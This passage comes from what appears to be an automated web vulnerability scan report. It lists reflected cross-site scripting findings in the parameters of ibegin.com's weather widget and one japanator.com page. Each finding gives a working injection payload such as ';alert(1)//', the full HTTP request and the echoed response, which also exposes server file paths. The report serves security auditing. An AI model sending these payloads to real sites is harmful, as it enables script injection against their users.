Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff69b10;alert(1)//368093ffe90-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="backgrou
...[SNIP]...

7.47. http://www.ibegin.com/weather/weather_widget.php [border_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the border_color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c8f80%3balert(1)//21c5509fcb6 was submitted in the border_color parameter. This input was echoed as c8f80;alert(1)//21c5509fcb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000c8f80%3balert(1)//21c5509fcb6&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000c8f80;alert(1)//21c5509fcb6-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; colo
...[SNIP]...

7.48. http://www.ibegin.com/weather/weather_widget.php [border_width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the border_width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 285e6%3balert(1)//e4c184846bc was submitted in the border_width parameter. This input was echoed as 285e6;alert(1)//e4c184846bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1285e6%3balert(1)//e4c184846bc&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1285e6;alert(1)//e4c184846bc-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #fffff
...[SNIP]...

7.49. http://www.ibegin.com/weather/weather_widget.php [city parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the city request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f10bd%3balert(1)//60cfe65333b was submitted in the city parameter. This input was echoed as f10bd;alert(1)//60cfe65333b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Restonf10bd%3balert(1)//60cfe65333b&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-restonf10bd;alert(1)//60cfe65333b-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div st
...[SNIP]...

7.50. http://www.ibegin.com/weather/weather_widget.php [color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2dbae%3balert(1)//5b07d7be905 was submitted in the color parameter. This input was echoed as 2dbae;alert(1)//5b07d7be905 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=0000002dbae%3balert(1)//5b07d7be905&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-0000002dbae;alert(1)//5b07d7be905-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-colo
...[SNIP]...

7.51. http://www.ibegin.com/weather/weather_widget.php [country parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the country request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31206%3balert(1)//199a4fe5d1a was submitted in the country parameter. This input was echoed as 31206;alert(1)//199a4fe5d1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us31206%3balert(1)//199a4fe5d1a&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us31206;alert(1)//199a4fe5d1a-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

documen
...[SNIP]...

7.52. http://www.ibegin.com/weather/weather_widget.php [current parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the current request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bf0d4%3balert(1)//11ce2c9a945 was submitted in the current parameter. This input was echoed as bf0d4;alert(1)//11ce2c9a945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1bf0d4%3balert(1)//11ce2c9a945&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:47:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1bf0d4;alert(1)//11ce2c9a945-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style=
...[SNIP]...

7.53. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the font_family request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 33d1e%3balert(1)//6ffbaad9015 was submitted in the font_family parameter. This input was echoed as 33d1e;alert(1)//6ffbaad9015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana33d1e%3balert(1)//6ffbaad9015&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
tice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana33d1e;alert(1)//6ffbaad9015-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color: #000000;
...[SNIP]...

7.54. http://www.ibegin.com/weather/weather_widget.php [font_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the font_size request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5e6df%3balert(1)//029aa189bd3 was submitted in the font_size parameter. This input was echoed as 5e6df;alert(1)//029aa189bd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=115e6df%3balert(1)//029aa189bd3&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-115e6df;alert(1)//029aa189bd3-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color:
...[SNIP]...

7.55. http://www.ibegin.com/weather/weather_widget.php [forecast parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the forecast request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fc4a7%3balert(1)//f9c3e7421 was submitted in the forecast parameter. This input was echoed as fc4a7;alert(1)//f9c3e7421 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1fc4a7%3balert(1)//f9c3e7421&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:47:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1558


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1fc4a7;alert(1)//f9c3e7421-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="b
...[SNIP]...

7.56. http://www.ibegin.com/weather/weather_widget.php [padding parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the padding request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3993a%3balert(1)//19a959291cc was submitted in the padding parameter. This input was echoed as 3993a;alert(1)//19a959291cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=103993a%3balert(1)//19a959291cc&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:51:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-103993a;alert(1)//19a959291cc-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #fff
...[SNIP]...

7.57. http://www.ibegin.com/weather/weather_widget.php [showicons parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the showicons request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3eb8b%3balert(1)//795fc0174d6 was submitted in the showicons parameter. This input was echoed as 3eb8b;alert(1)//795fc0174d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=13eb8b%3balert(1)//795fc0174d6 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
ce: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-13eb8b;alert(1)//795fc0174d6-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color: #000000; w
...[SNIP]...

7.58. http://www.ibegin.com/weather/weather_widget.php [smallicon parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the smallicon request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7f9f8%3balert(1)//d9661db8ae5 was submitted in the smallicon parameter. This input was echoed as 7f9f8;alert(1)//d9661db8ae5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=17f9f8%3balert(1)//d9661db8ae5&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:46:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-17f9f8;alert(1)//d9661db8ae5-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div styl
...[SNIP]...

7.59. http://www.ibegin.com/weather/weather_widget.php [state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the state request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6d844%3balert(1)//2cee12dca9c was submitted in the state parameter. This input was echoed as 6d844;alert(1)//2cee12dca9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia6d844%3balert(1)//2cee12dca9c&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia6d844;alert(1)//2cee12dca9c-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('
...[SNIP]...

7.60. http://www.ibegin.com/weather/weather_widget.php [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1ac6d%3balert(1)//d4572dd3323 was submitted in the type parameter. This input was echoed as 1ac6d;alert(1)//d4572dd3323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js1ac6d%3balert(1)//d4572dd3323&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js1ac6d;alert(1)//d4572dd3323-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

docu
...[SNIP]...

7.61. http://www.ibegin.com/weather/weather_widget.php [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dbbf2%3balert(1)//d1a0397db91 was submitted in the width parameter. This input was echoed as dbbf2;alert(1)//d1a0397db91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175dbbf2%3balert(1)//d1a0397db91&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175dbbf2;alert(1)//d1a0397db91-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #
...[SNIP]...

7.62. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e6c0"><script>alert(1)</script>555ac0fda78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

